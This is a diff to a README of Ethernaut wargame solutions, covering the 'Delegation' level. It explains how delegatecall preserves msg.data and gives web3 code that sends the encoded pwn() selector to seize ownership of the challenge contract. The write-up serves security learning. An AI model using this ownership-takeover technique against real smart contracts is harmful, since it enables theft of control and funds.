AIT-S/Ethernaut-Solutions/README.md

 ```

 ## 6. Delegation
-Be very very careful when using delegatecall. msg.sender, msg.data, msg.value are all preserved.
-Always do a check to ensure that msg.data.length == 0 if you don't want them to call any function. https://solidity.readthedocs.io/en/v0.4.25/types.html#address for more info.
-All I had to do was trigger the fallback function (note that it is not payable) with "pwn()" as the msg.value. https://web3js.readthedocs.io/en/1.0/web3-eth.html#eth-sendtransaction
+DelegateCall means you take the implementation logic of the function in the contract you're making this call to but using the storage of the calling contract.
+Since msg.sender, msg.data, msg.value are all preserved when performing a DelegateCall, you just needed to pass in a malicious msg.data i.e. the encoded payload of `pwn()` function to gain ownership of the `Delegation` contract.
 ```
+let payload = web3.eth.abi.encodeFunctionSignature({
+    name: 'pwn',
+    type: 'function',
+    inputs: []
+});

-await contract.sendTransaction({data: web3.sha3("pwn()").slice(0, 10)})
+await contract.sendTransaction({
+    data: payload
+});
 ```

 ## 7. Force